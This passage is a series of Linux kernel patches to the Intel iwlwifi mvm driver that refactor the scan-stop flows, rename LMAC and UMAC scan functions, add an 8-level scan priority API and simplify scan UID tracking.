iwl_mvm_scan_lmac(struct iwl_mvm *mvm, struct ieee80211_vif *vif, return 0; } -int iwl_mvm_cancel_scan(struct iwl_mvm *mvm) +int iwl_mvm_reg_scan_stop(struct iwl_mvm *mvm) { + int ret; + if (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN) return iwl_umac_scan_stop(mvm, IWL_MVM_SCAN_REGULAR, true); @@ -936,13 +896,52 @@ int iwl_mvm_cancel_scan(struct iwl_mvm *mvm) return 0; if (iwl_mvm_is_radio_killed(mvm)) { - ieee80211_scan_completed(mvm->hw, true); - iwl_mvm_unref(mvm, IWL_MVM_REF_SCAN); - mvm->scan_status &= ~IWL_MVM_SCAN_REGULAR; + ret = 0; + goto out; + } + + ret = iwl_mvm_lmac_scan_stop(mvm, IWL_MVM_SCAN_REGULAR); + if (!ret) + mvm->scan_status |= IWL_MVM_SCAN_STOPPING_REGULAR; +out: + /* Clear the scan status so the next scan requests will + * succeed and mark the scan as stopping, so that the Rx + * handler doesn't do anything, as the scan was stopped from + * above. Since the rx handler won't do anything now, we have + * to release the scan reference here. + */ + iwl_mvm_unref(mvm, IWL_MVM_REF_SCAN); + + mvm->scan_status &= ~IWL_MVM_SCAN_REGULAR; + ieee80211_scan_completed(mvm->hw, true); + + return ret; +} + +int iwl_mvm_sched_scan_stop(struct iwl_mvm *mvm, bool notify) +{ + int ret; + + if (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN) + return iwl_umac_scan_stop(mvm, IWL_MVM_SCAN_SCHED, notify); + + if (!(mvm->scan_status & IWL_MVM_SCAN_SCHED)) return 0; + + if (iwl_mvm_is_radio_killed(mvm)) { + ret = 0; + goto out; } - return iwl_mvm_scan_offload_stop(mvm, true); + ret = iwl_mvm_lmac_scan_stop(mvm, IWL_MVM_SCAN_SCHED); + if (!ret) + mvm->scan_status |= IWL_MVM_SCAN_STOPPING_SCHED; +out: + mvm->scan_status &= ~IWL_MVM_SCAN_SCHED; + if (notify) + ieee80211_sched_scan_stopped(mvm->hw); + + return ret; } /* UMAC scan API */ @@ -1275,11 +1274,11 @@ static int iwl_mvm_check_running_scans(struct iwl_mvm *mvm, int type) case IWL_MVM_SCAN_REGULAR: if (mvm->scan_status & IWL_MVM_SCAN_REGULAR_MASK) return -EBUSY; - return iwl_mvm_scan_offload_stop(mvm, true); + return iwl_mvm_sched_scan_stop(mvm, true); case IWL_MVM_SCAN_SCHED: if (mvm->scan_status & IWL_MVM_SCAN_SCHED_MASK) return -EBUSY; - return iwl_mvm_cancel_scan(mvm); + return iwl_mvm_reg_scan_stop(mvm); case IWL_MVM_SCAN_NETDETECT: /* No need to stop anything for net-detect since the * firmware is restarted anyway. This way, any sched From 7576d54f9e372dbbe77c5291e15a67296d502674 Mon Sep 17 00:00:00 2001 From: Luciano Coelho Date: Tue, 12 May 2015 09:30:36 +0300 Subject: [PATCH 381/872] iwlwifi: mvm: don't stop regular scans when going out of idle state It is not necessary to stop regular scans when going out of idle state. Previously, we were doing so for LMAC scans because the iwl_mvm_scan_offload_stop() function was stopping both kinds of scans. Now that we have more granularity, we can skip it. Signed-off-by: Luciano Coelho Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/mac80211.c | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/mac80211.c b/drivers/net/wireless/iwlwifi/mvm/mac80211.c index 13469315ed33..df0199ec4da7 100644 --- a/drivers/net/wireless/iwlwifi/mvm/mac80211.c +++ b/drivers/net/wireless/iwlwifi/mvm/mac80211.c @@ -2360,10 +2360,8 @@ static void iwl_mvm_bss_info_changed(struct ieee80211_hw *hw, mutex_lock(&mvm->mutex); - if (changes & BSS_CHANGED_IDLE && !bss_conf->idle) { + if (changes & BSS_CHANGED_IDLE && !bss_conf->idle) iwl_mvm_sched_scan_stop(mvm, true); - iwl_mvm_reg_scan_stop(mvm); - } switch (vif->type) { case NL80211_IFTYPE_STATION: From 5d2e8d932c1c3d64418842c159862d003135ad0b Mon Sep 17 00:00:00 2001 From: Luciano Coelho Date: Tue, 5 May 2015 10:05:42 +0300 Subject: [PATCH 382/872] iwlwifi: mvm: combine part of the scan stop flows For UMAC scans, we were simply jumping into another function when scan stop functions were called, while for LMAC scans, the flow continued. To make the flows cleaner and more balanced, combine the UMAC part into the main stop functions. This also makes us take one step closer into combining the state flags for both APIs. Note that some STOPPING flags will be dangling in UMAC scans, but it doesn't matter because they are not used in UMAC yet (and this will be fixed in subsequent patches). Signed-off-by: Luciano Coelho Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/scan.c | 40 ++++++++----------------- 1 file changed, 12 insertions(+), 28 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/scan.c b/drivers/net/wireless/iwlwifi/mvm/scan.c index 579b36b0fecb..ec8ef56a15ab 100644 --- a/drivers/net/wireless/iwlwifi/mvm/scan.c +++ b/drivers/net/wireless/iwlwifi/mvm/scan.c @@ -101,7 +101,7 @@ struct iwl_mvm_scan_params { } schedule[2]; }; -static int iwl_umac_scan_stop(struct iwl_mvm *mvm, int type, bool notify); +static int iwl_umac_scan_stop(struct iwl_mvm *mvm, int type); static u8 iwl_mvm_scan_rx_ant(struct iwl_mvm *mvm) { @@ -889,9 +889,6 @@ int iwl_mvm_reg_scan_stop(struct iwl_mvm *mvm) { int ret; - if (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN) - return iwl_umac_scan_stop(mvm, IWL_MVM_SCAN_REGULAR, true); - if (!(mvm->scan_status & IWL_MVM_SCAN_REGULAR)) return 0; @@ -900,7 +897,11 @@ int iwl_mvm_reg_scan_stop(struct iwl_mvm *mvm) goto out; } - ret = iwl_mvm_lmac_scan_stop(mvm, IWL_MVM_SCAN_REGULAR); + if (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN) + ret = iwl_umac_scan_stop(mvm, IWL_MVM_SCAN_REGULAR); + else + ret = iwl_mvm_lmac_scan_stop(mvm, IWL_MVM_SCAN_REGULAR); + if (!ret) mvm->scan_status |= IWL_MVM_SCAN_STOPPING_REGULAR; out: @@ -922,9 +923,6 @@ int iwl_mvm_sched_scan_stop(struct iwl_mvm *mvm, bool notify) { int ret; - if (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN) - return iwl_umac_scan_stop(mvm, IWL_MVM_SCAN_SCHED, notify); - if (!(mvm->scan_status & IWL_MVM_SCAN_SCHED)) return 0; @@ -933,7 +931,11 @@ int iwl_mvm_sched_scan_stop(struct iwl_mvm *mvm, bool notify) goto out; } - ret = iwl_mvm_lmac_scan_stop(mvm, IWL_MVM_SCAN_SCHED); + if (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN) + ret = iwl_umac_scan_stop(mvm, IWL_MVM_SCAN_SCHED); + else + ret = iwl_mvm_lmac_scan_stop(mvm, IWL_MVM_SCAN_SCHED); + if (!ret) mvm->scan_status |= IWL_MVM_SCAN_STOPPING_SCHED; out: @@ -1585,7 +1587,7 @@ static int iwl_umac_scan_abort_one(struct iwl_mvm *mvm, u32 uid) return iwl_mvm_send_cmd_pdu(mvm, SCAN_ABORT_UMAC, 0, sizeof(cmd), &cmd); } -static int iwl_umac_scan_stop(struct iwl_mvm *mvm, int type, bool notify) +static int iwl_umac_scan_stop(struct iwl_mvm *mvm, int type) { struct iwl_notification_wait wait_scan_done; static const u8 scan_done_notif[] = { SCAN_COMPLETE_UMAC, }; @@ -1606,13 +1608,6 @@ static int iwl_umac_scan_stop(struct iwl_mvm *mvm, int type, bool notify) if (mvm->scan_uid[i] & type) { int err; - if (iwl_mvm_is_radio_killed(mvm) && - (type & IWL_MVM_SCAN_REGULAR)) { - ieee80211_scan_completed(mvm->hw, true); - iwl_mvm_unref(mvm, IWL_MVM_REF_SCAN); - break; - } - err = iwl_umac_scan_abort_one(mvm, mvm->scan_uid[i]); if (!err) ret = 0; @@ -1626,17 +1621,6 @@ static int iwl_umac_scan_stop(struct iwl_mvm *mvm, int type, bool notify) } ret = iwl_wait_notification(&mvm->notif_wait, &wait_scan_done, 1 * HZ); - if (ret) - return ret; - - if (notify) { - if (type & IWL_MVM_SCAN_SCHED) - ieee80211_sched_scan_stopped(mvm->hw); - if (type & IWL_MVM_SCAN_REGULAR) { - ieee80211_scan_completed(mvm->hw, true); - iwl_mvm_unref(mvm, IWL_MVM_REF_SCAN); - } - } return ret; } From dfbf156d05a43f5ffb918f25bc75265ed39011f0 Mon Sep 17 00:00:00 2001 From: Luciano Coelho Date: Tue, 5 May 2015 11:21:34 +0300 Subject: [PATCH 383/872] iwlwifi: mvm: rename umac scan stop function For consistency with the LMAC functions, rename the UMAC scan stop function to iwl_mvm_umac_scan_stop(). Additionally, move things around a bit to avoid an unnecessary forward declaration. Signed-off-by: Luciano Coelho Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/scan.c | 126 ++++++++++++------------ 1 file changed, 62 insertions(+), 64 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/scan.c b/drivers/net/wireless/iwlwifi/mvm/scan.c index ec8ef56a15ab..bee92d72f263 100644 --- a/drivers/net/wireless/iwlwifi/mvm/scan.c +++ b/drivers/net/wireless/iwlwifi/mvm/scan.c @@ -101,8 +101,6 @@ struct iwl_mvm_scan_params { } schedule[2]; }; -static int iwl_umac_scan_stop(struct iwl_mvm *mvm, int type); - static u8 iwl_mvm_scan_rx_ant(struct iwl_mvm *mvm) { if (mvm->scan_rx_ant != ANT_NONE) @@ -885,67 +883,6 @@ static int iwl_mvm_scan_lmac(struct iwl_mvm *mvm, struct ieee80211_vif *vif, return 0; } -int iwl_mvm_reg_scan_stop(struct iwl_mvm *mvm) -{ - int ret; - - if (!(mvm->scan_status & IWL_MVM_SCAN_REGULAR)) - return 0; - - if (iwl_mvm_is_radio_killed(mvm)) { - ret = 0; - goto out; - } - - if (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN) - ret = iwl_umac_scan_stop(mvm, IWL_MVM_SCAN_REGULAR); - else - ret = iwl_mvm_lmac_scan_stop(mvm, IWL_MVM_SCAN_REGULAR); - - if (!ret) - mvm->scan_status |= IWL_MVM_SCAN_STOPPING_REGULAR; -out: - /* Clear the scan status so the next scan requests will - * succeed and mark the scan as stopping, so that the Rx - * handler doesn't do anything, as the scan was stopped from - * above. Since the rx handler won't do anything now, we have - * to release the scan reference here. - */ - iwl_mvm_unref(mvm, IWL_MVM_REF_SCAN); - - mvm->scan_status &= ~IWL_MVM_SCAN_REGULAR; - ieee80211_scan_completed(mvm->hw, true); - - return ret; -} - -int iwl_mvm_sched_scan_stop(struct iwl_mvm *mvm, bool notify) -{ - int ret; - - if (!(mvm->scan_status & IWL_MVM_SCAN_SCHED)) - return 0; - - if (iwl_mvm_is_radio_killed(mvm)) { - ret = 0; - goto out; - } - - if (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN) - ret = iwl_umac_scan_stop(mvm, IWL_MVM_SCAN_SCHED); - else - ret = iwl_mvm_lmac_scan_stop(mvm, IWL_MVM_SCAN_SCHED); - - if (!ret) - mvm->scan_status |= IWL_MVM_SCAN_STOPPING_SCHED; -out: - mvm->scan_status &= ~IWL_MVM_SCAN_SCHED; - if (notify) - ieee80211_sched_scan_stopped(mvm->hw); - - return ret; -} - /* UMAC scan API */ struct iwl_umac_scan_done { @@ -1587,7 +1524,7 @@ static int iwl_umac_scan_abort_one(struct iwl_mvm *mvm, u32 uid) return iwl_mvm_send_cmd_pdu(mvm, SCAN_ABORT_UMAC, 0, sizeof(cmd), &cmd); } -static int iwl_umac_scan_stop(struct iwl_mvm *mvm, int type) +static int iwl_mvm_umac_scan_stop(struct iwl_mvm *mvm, int type) { struct iwl_notification_wait wait_scan_done; static const u8 scan_done_notif[] = { SCAN_COMPLETE_UMAC, }; @@ -1681,3 +1618,64 @@ void iwl_mvm_report_scan_aborted(struct iwl_mvm *mvm) ieee80211_sched_scan_stopped(mvm->hw); } } + +int iwl_mvm_reg_scan_stop(struct iwl_mvm *mvm) +{ + int ret; + + if (!(mvm->scan_status & IWL_MVM_SCAN_REGULAR)) + return 0; + + if (iwl_mvm_is_radio_killed(mvm)) { + ret = 0; + goto out; + } + + if (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN) + ret = iwl_mvm_umac_scan_stop(mvm, IWL_MVM_SCAN_REGULAR); + else + ret = iwl_mvm_lmac_scan_stop(mvm, IWL_MVM_SCAN_REGULAR); + + if (!ret) + mvm->scan_status |= IWL_MVM_SCAN_STOPPING_REGULAR; +out: + /* Clear the scan status so the next scan requests will + * succeed and mark the scan as stopping, so that the Rx + * handler doesn't do anything, as the scan was stopped from + * above. Since the rx handler won't do anything now, we have + * to release the scan reference here. + */ + iwl_mvm_unref(mvm, IWL_MVM_REF_SCAN); + + mvm->scan_status &= ~IWL_MVM_SCAN_REGULAR; + ieee80211_scan_completed(mvm->hw, true); + + return ret; +} + +int iwl_mvm_sched_scan_stop(struct iwl_mvm *mvm, bool notify) +{ + int ret; + + if (!(mvm->scan_status & IWL_MVM_SCAN_SCHED)) + return 0; + + if (iwl_mvm_is_radio_killed(mvm)) { + ret = 0; + goto out; + } + + if (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN) + ret = iwl_mvm_umac_scan_stop(mvm, IWL_MVM_SCAN_SCHED); + else + ret = iwl_mvm_lmac_scan_stop(mvm, IWL_MVM_SCAN_SCHED); + + if (!ret) + mvm->scan_status |= IWL_MVM_SCAN_STOPPING_SCHED; +out: + mvm->scan_status &= ~IWL_MVM_SCAN_SCHED; + if (notify) + ieee80211_sched_scan_stopped(mvm->hw); + + return ret; +} From 6e56f01deadd50997ebca899e3260dad554e4c47 Mon Sep 17 00:00:00 2001 From: Luciano Coelho Date: Wed, 6 May 2015 16:03:39 +0300 Subject: [PATCH 384/872] iwlwifi: mvm: rename some LMAC-specific scan functions Some LMAC specific functions had too generic names (i.e. *_scan_offload_*) and were hard to distinguish from functions that are really generic. Rename these functions to *_lmac_scan_* in to make it more consistent and easier to read. Signed-off-by: Luciano Coelho Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/mvm.h | 18 +++++++++--------- drivers/net/wireless/iwlwifi/mvm/ops.c | 6 +++--- drivers/net/wireless/iwlwifi/mvm/scan.c | 22 +++++++++++----------- 3 files changed, 23 insertions(+), 23 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/mvm.h b/drivers/net/wireless/iwlwifi/mvm/mvm.h index 71b776358dc0..760c626ec13e 100644 --- a/drivers/net/wireless/iwlwifi/mvm/mvm.h +++ b/drivers/net/wireless/iwlwifi/mvm/mvm.h @@ -1127,21 +1127,21 @@ int iwl_mvm_max_scan_ie_len(struct iwl_mvm *mvm); void iwl_mvm_report_scan_aborted(struct iwl_mvm *mvm); /* Scheduled scan */ -int iwl_mvm_rx_scan_offload_complete_notif(struct iwl_mvm *mvm, - struct iwl_rx_cmd_buffer *rxb, - struct iwl_device_cmd *cmd); -int iwl_mvm_rx_scan_offload_iter_complete_notif(struct iwl_mvm *mvm, - struct iwl_rx_cmd_buffer *rxb, - struct iwl_device_cmd *cmd); +int iwl_mvm_rx_lmac_scan_complete_notif(struct iwl_mvm *mvm, + struct iwl_rx_cmd_buffer *rxb, + struct iwl_device_cmd *cmd); +int iwl_mvm_rx_lmac_scan_iter_complete_notif(struct iwl_mvm *mvm, + struct iwl_rx_cmd_buffer *rxb, + struct iwl_device_cmd *cmd); int iwl_mvm_sched_scan_start(struct iwl_mvm *mvm, struct ieee80211_vif *vif, struct cfg80211_sched_scan_request *req, struct ieee80211_scan_ies *ies, int type); int iwl_mvm_sched_scan_stop(struct iwl_mvm *mvm, bool notify); -int iwl_mvm_rx_scan_offload_results(struct iwl_mvm *mvm, - struct iwl_rx_cmd_buffer *rxb, - struct iwl_device_cmd *cmd); +int iwl_mvm_rx_scan_match_found(struct iwl_mvm *mvm, + struct iwl_rx_cmd_buffer *rxb, + struct iwl_device_cmd *cmd); /* UMAC scan */ int iwl_mvm_config_scan(struct iwl_mvm *mvm); diff --git a/drivers/net/wireless/iwlwifi/mvm/ops.c b/drivers/net/wireless/iwlwifi/mvm/ops.c index 4935caf6543f..690b33677510 100644 --- a/drivers/net/wireless/iwlwifi/mvm/ops.c +++ b/drivers/net/wireless/iwlwifi/mvm/ops.c @@ -238,10 +238,10 @@ static const struct iwl_rx_handlers iwl_mvm_rx_handlers[] = { RX_HANDLER(EOSP_NOTIFICATION, iwl_mvm_rx_eosp_notif, false), RX_HANDLER(SCAN_ITERATION_COMPLETE, - iwl_mvm_rx_scan_offload_iter_complete_notif, false), + iwl_mvm_rx_lmac_scan_iter_complete_notif, false), RX_HANDLER(SCAN_OFFLOAD_COMPLETE, - iwl_mvm_rx_scan_offload_complete_notif, true), - RX_HANDLER(MATCH_FOUND_NOTIFICATION, iwl_mvm_rx_scan_offload_results, + iwl_mvm_rx_lmac_scan_complete_notif, true), + RX_HANDLER(MATCH_FOUND_NOTIFICATION, iwl_mvm_rx_scan_match_found, false), RX_HANDLER(SCAN_COMPLETE_UMAC, iwl_mvm_rx_umac_scan_complete_notif, true), diff --git a/drivers/net/wireless/iwlwifi/mvm/scan.c b/drivers/net/wireless/iwlwifi/mvm/scan.c index bee92d72f263..9bececec9ce5 100644 --- a/drivers/net/wireless/iwlwifi/mvm/scan.c +++ b/drivers/net/wireless/iwlwifi/mvm/scan.c @@ -325,9 +325,9 @@ static u8 *iwl_mvm_dump_channel_list(struct iwl_scan_results_notif *res, return buf; } -int iwl_mvm_rx_scan_offload_iter_complete_notif(struct iwl_mvm *mvm, - struct iwl_rx_cmd_buffer *rxb, - struct iwl_device_cmd *cmd) +int iwl_mvm_rx_lmac_scan_iter_complete_notif(struct iwl_mvm *mvm, + struct iwl_rx_cmd_buffer *rxb, + struct iwl_device_cmd *cmd) { struct iwl_rx_packet *pkt = rxb_addr(rxb); struct iwl_lmac_scan_complete_notif *notif = (void *)pkt->data; @@ -342,9 +342,9 @@ int iwl_mvm_rx_scan_offload_iter_complete_notif(struct iwl_mvm *mvm, return 0; } -int iwl_mvm_rx_scan_offload_results(struct iwl_mvm *mvm, - struct iwl_rx_cmd_buffer *rxb, - struct iwl_device_cmd *cmd) +int iwl_mvm_rx_scan_match_found(struct iwl_mvm *mvm, + struct iwl_rx_cmd_buffer *rxb, + struct iwl_device_cmd *cmd) { IWL_DEBUG_SCAN(mvm, "Scheduled scan results\n"); ieee80211_sched_scan_results(mvm->hw); @@ -352,9 +352,9 @@ int iwl_mvm_rx_scan_offload_results(struct iwl_mvm *mvm, return 0; } -int iwl_mvm_rx_scan_offload_complete_notif(struct iwl_mvm *mvm, - struct iwl_rx_cmd_buffer *rxb, - struct iwl_device_cmd *cmd) +int iwl_mvm_rx_lmac_scan_complete_notif(struct iwl_mvm *mvm, + struct iwl_rx_cmd_buffer *rxb, + struct iwl_device_cmd *cmd) { struct iwl_rx_packet *pkt = rxb_addr(rxb); struct iwl_periodic_scan_complete *scan_notif = (void *)pkt->data; @@ -557,7 +557,7 @@ static bool iwl_mvm_scan_pass_all(struct iwl_mvm *mvm, return true; } -static int iwl_mvm_send_scan_offload_abort(struct iwl_mvm *mvm) +static int iwl_mvm_send_lmac_scan_abort(struct iwl_mvm *mvm) { int ret; struct iwl_host_cmd cmd = { @@ -598,7 +598,7 @@ static int iwl_mvm_lmac_scan_stop(struct iwl_mvm *mvm, int type) ARRAY_SIZE(scan_done_notif), NULL, NULL); - ret = iwl_mvm_send_scan_offload_abort(mvm); + ret = iwl_mvm_send_lmac_scan_abort(mvm); if (ret) { IWL_DEBUG_SCAN(mvm, "Send stop %sscan failed %d\n", sched ? "offloaded " : "", ret); From d7afbfc418a66459d1cf2e441aa50854da5e6297 Mon Sep 17 00:00:00 2001 From: Avraham Stern Date: Tue, 12 May 2015 12:19:48 +0300 Subject: [PATCH 385/872] iwlwifi: mvm: add support for 8 level scan priority API Add support for scan priority API with 8 levels instead of the existing 3 levels. This API is needed to define the priority of new ooc activities, e.g. gscan. Add a TLV flag to indicate if the new API is supported so that devices that does not support the new API will continue to use the old one. Signed-off-by: Avraham Stern Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/iwl-fw-file.h | 3 +++ .../net/wireless/iwlwifi/mvm/fw-api-scan.h | 11 ++++++++ drivers/net/wireless/iwlwifi/mvm/scan.c | 26 ++++++++++++++++--- 3 files changed, 36 insertions(+), 4 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/iwl-fw-file.h b/drivers/net/wireless/iwlwifi/iwl-fw-file.h index c7cfc38a2644..839b2c4a1ad8 100644 --- a/drivers/net/wireless/iwlwifi/iwl-fw-file.h +++ b/drivers/net/wireless/iwlwifi/iwl-fw-file.h @@ -255,6 +255,8 @@ enum iwl_ucode_tlv_flag { * @IWL_UCODE_TLV_API_LQ_SS_PARAMS: Configure STBC/BFER via LQ CMD ss_params * @IWL_UCODE_TLV_API_STATS_V10: uCode supports/uses statistics API version 10 * @IWL_UCODE_TLV_API_NEW_VERSION: new versioning format + * @IWL_UCODE_TLV_API_EXT_SCAN_PRIORITY: scan APIs use 8-level priority + * instead of 3. */ enum iwl_ucode_tlv_api { IWL_UCODE_TLV_API_BT_COEX_SPLIT = BIT(3), @@ -269,6 +271,7 @@ enum iwl_ucode_tlv_api { IWL_UCODE_TLV_API_LQ_SS_PARAMS = BIT(18), IWL_UCODE_TLV_API_STATS_V10 = BIT(19), IWL_UCODE_TLV_API_NEW_VERSION = BIT(20), + IWL_UCODE_TLV_API_EXT_SCAN_PRIORITY = BIT(24), }; /** diff --git a/drivers/net/wireless/iwlwifi/mvm/fw-api-scan.h b/drivers/net/wireless/iwlwifi/mvm/fw-api-scan.h index 022869323ca9..f34cf002e243 100644 --- a/drivers/net/wireless/iwlwifi/mvm/fw-api-scan.h +++ b/drivers/net/wireless/iwlwifi/mvm/fw-api-scan.h @@ -431,6 +431,17 @@ enum iwl_scan_priority { IWL_SCAN_PRIORITY_HIGH, }; +enum iwl_scan_priority_ext { + IWL_SCAN_PRIORITY_EXT_0_LOWEST, + IWL_SCAN_PRIORITY_EXT_1, + IWL_SCAN_PRIORITY_EXT_2, + IWL_SCAN_PRIORITY_EXT_3, + IWL_SCAN_PRIORITY_EXT_4, + IWL_SCAN_PRIORITY_EXT_5, + IWL_SCAN_PRIORITY_EXT_6, + IWL_SCAN_PRIORITY_EXT_7_HIGHEST, +}; + /** * iwl_scan_req_lmac - SCAN_REQUEST_CMD_API_S_VER_1 * @reserved1: for alignment and future use diff --git a/drivers/net/wireless/iwlwifi/mvm/scan.c b/drivers/net/wireless/iwlwifi/mvm/scan.c index 9bececec9ce5..d0312f0caffc 100644 --- a/drivers/net/wireless/iwlwifi/mvm/scan.c +++ b/drivers/net/wireless/iwlwifi/mvm/scan.c @@ -744,6 +744,21 @@ iwl_mvm_build_scan_probe(struct iwl_mvm *mvm, struct ieee80211_vif *vif, params->preq.common_data.len = cpu_to_le16(ies->common_ie_len); } +static __le32 iwl_mvm_scan_priority(struct iwl_mvm *mvm, + enum iwl_scan_priority_ext prio) +{ + if (mvm->fw->ucode_capa.api[0] & IWL_UCODE_TLV_API_EXT_SCAN_PRIORITY) + return cpu_to_le32(prio); + + if (prio <= IWL_SCAN_PRIORITY_EXT_2) + return cpu_to_le32(IWL_SCAN_PRIORITY_LOW); + + if (prio <= IWL_SCAN_PRIORITY_EXT_4) + return cpu_to_le32(IWL_SCAN_PRIORITY_MEDIUM); + + return cpu_to_le32(IWL_SCAN_PRIORITY_HIGH); +} + static void iwl_mvm_scan_lmac_dwell(struct iwl_mvm *mvm, struct iwl_scan_req_lmac *cmd, struct iwl_mvm_scan_params *params) @@ -755,7 +770,7 @@ static void iwl_mvm_scan_lmac_dwell(struct iwl_mvm *mvm, params->dwell[IEEE80211_BAND_2GHZ].fragmented; cmd->max_out_time = cpu_to_le32(params->max_out_time); cmd->suspend_time = cpu_to_le32(params->suspend_time); - cmd->scan_prio = cpu_to_le32(IWL_SCAN_PRIORITY_HIGH); + cmd->scan_prio = iwl_mvm_scan_priority(mvm, IWL_SCAN_PRIORITY_EXT_6); } static inline bool iwl_mvm_scan_fits(struct iwl_mvm *mvm, int n_ssids, @@ -1070,12 +1085,15 @@ static void iwl_mvm_scan_umac_dwell(struct iwl_mvm *mvm, params->dwell[IEEE80211_BAND_2GHZ].fragmented; cmd->max_out_time = cpu_to_le32(params->max_out_time); cmd->suspend_time = cpu_to_le32(params->suspend_time); - cmd->scan_priority = cpu_to_le32(IWL_SCAN_PRIORITY_HIGH); + cmd->scan_priority = + iwl_mvm_scan_priority(mvm, IWL_SCAN_PRIORITY_EXT_6); if (iwl_mvm_scan_total_iterations(params) == 0) - cmd->ooc_priority = cpu_to_le32(IWL_SCAN_PRIORITY_HIGH); + cmd->ooc_priority = + iwl_mvm_scan_priority(mvm, IWL_SCAN_PRIORITY_EXT_6); else - cmd->ooc_priority = cpu_to_le32(IWL_SCAN_PRIORITY_LOW); + cmd->ooc_priority = + iwl_mvm_scan_priority(mvm, IWL_SCAN_PRIORITY_EXT_2); } static void From 6185af2aad5b1bd63d962008c6449f3ae3ef896b Mon Sep 17 00:00:00 2001 From: Luciano Coelho Date: Thu, 7 May 2015 11:13:24 +0300 Subject: [PATCH 386/872] iwlwifi: mvm: refactor UMAC scan UID handling We can only have one scan of each type running at the same time, so we can remove one attribute in the UID information we save. We had array index, UID and type, but only UID (== array_index) and type are necessary. Refactor the code to use this simplified array. Signed-off-by: Luciano Coelho Reviewed-by: Johannes Berg Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/mac80211.c | 8 +- drivers/net/wireless/iwlwifi/mvm/mvm.h | 3 +- drivers/net/wireless/iwlwifi/mvm/scan.c | 126 ++++++-------------- 3 files changed, 39 insertions(+), 98 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/mac80211.c b/drivers/net/wireless/iwlwifi/mvm/mac80211.c index df0199ec4da7..cea236b6c2ed 100644 --- a/drivers/net/wireless/iwlwifi/mvm/mac80211.c +++ b/drivers/net/wireless/iwlwifi/mvm/mac80211.c @@ -1434,10 +1434,10 @@ void __iwl_mvm_mac_stop(struct iwl_mvm *mvm) int i; for (i = 0; i < mvm->max_scans; i++) { - if (WARN_ONCE(mvm->scan_uid[i], - "UMAC scan UID %d was not cleaned\n", - mvm->scan_uid[i])) - mvm->scan_uid[i] = 0; + if (WARN_ONCE(mvm->scan_uid_status[i], + "UMAC scan UID %d status was not cleaned\n", + i)) + mvm->scan_uid_status[i] = 0; } } diff --git a/drivers/net/wireless/iwlwifi/mvm/mvm.h b/drivers/net/wireless/iwlwifi/mvm/mvm.h index 760c626ec13e..f22d30988c96 100644 --- a/drivers/net/wireless/iwlwifi/mvm/mvm.h +++ b/drivers/net/wireless/iwlwifi/mvm/mvm.h @@ -628,8 +628,7 @@ struct iwl_mvm { unsigned int max_scans; /* UMAC scan tracking */ - u32 scan_uid[IWL_MVM_MAX_UMAC_SCANS]; - u8 scan_seq_num, sched_scan_seq_num; + u32 scan_uid_status[IWL_MVM_MAX_UMAC_SCANS]; /* rx chain antennas set through debugfs for the scan command */ u8 scan_rx_ant; diff --git a/drivers/net/wireless/iwlwifi/mvm/scan.c b/drivers/net/wireless/iwlwifi/mvm/scan.c index d0312f0caffc..496d1dfe4f7b 100644 --- a/drivers/net/wireless/iwlwifi/mvm/scan.c +++ b/drivers/net/wireless/iwlwifi/mvm/scan.c @@ -1013,65 +1013,15 @@ int iwl_mvm_config_scan(struct iwl_mvm *mvm) return ret; } -static int iwl_mvm_find_scan_uid(struct iwl_mvm *mvm, u32 uid) +static int iwl_mvm_scan_uid_by_status(struct iwl_mvm *mvm, int status) { int i; for (i = 0; i < mvm->max_scans; i++) - if (mvm->scan_uid[i] == uid) + if (mvm->scan_uid_status[i] == status) return i; - return i; -} - -static int iwl_mvm_find_free_scan_uid(struct iwl_mvm *mvm) -{ - return iwl_mvm_find_scan_uid(mvm, 0); -} - -static bool iwl_mvm_find_scan_type(struct iwl_mvm *mvm, int type) -{ - int i; - - for (i = 0; i < mvm->max_scans; i++) - if (mvm->scan_uid[i] & type) - return true; - - return false; -} - -static int iwl_mvm_find_first_scan(struct iwl_mvm *mvm, int type) -{ - int i; - - for (i = 0; i < mvm->max_scans; i++) - if (mvm->scan_uid[i] & type) - return i; - - return i; -} - -static u32 iwl_generate_scan_uid(struct iwl_mvm *mvm, int type) -{ - u32 uid; - - /* make sure exactly one bit is on in scan type */ - WARN_ON(hweight8(type) != 1); - - /* - * Make sure scan uids are unique. If one scan lasts long time while - * others are completing frequently, the seq number will wrap up and - * we may have more than one scan with the same uid. - */ - do { - uid = type | (mvm->scan_seq_num << - IWL_UMAC_SCAN_UID_SEQ_OFFSET); - mvm->scan_seq_num++; - } while (iwl_mvm_find_scan_uid(mvm, uid) < mvm->max_scans); - - IWL_DEBUG_SCAN(mvm, "Generated scan UID %u\n", uid); - - return uid; + return -ENOENT; } static void iwl_mvm_scan_umac_dwell(struct iwl_mvm *mvm, @@ -1146,22 +1096,22 @@ static u32 iwl_mvm_scan_umac_flags(struct iwl_mvm *mvm, } static int iwl_mvm_scan_umac(struct iwl_mvm *mvm, struct ieee80211_vif *vif, - struct iwl_mvm_scan_params *params) + struct 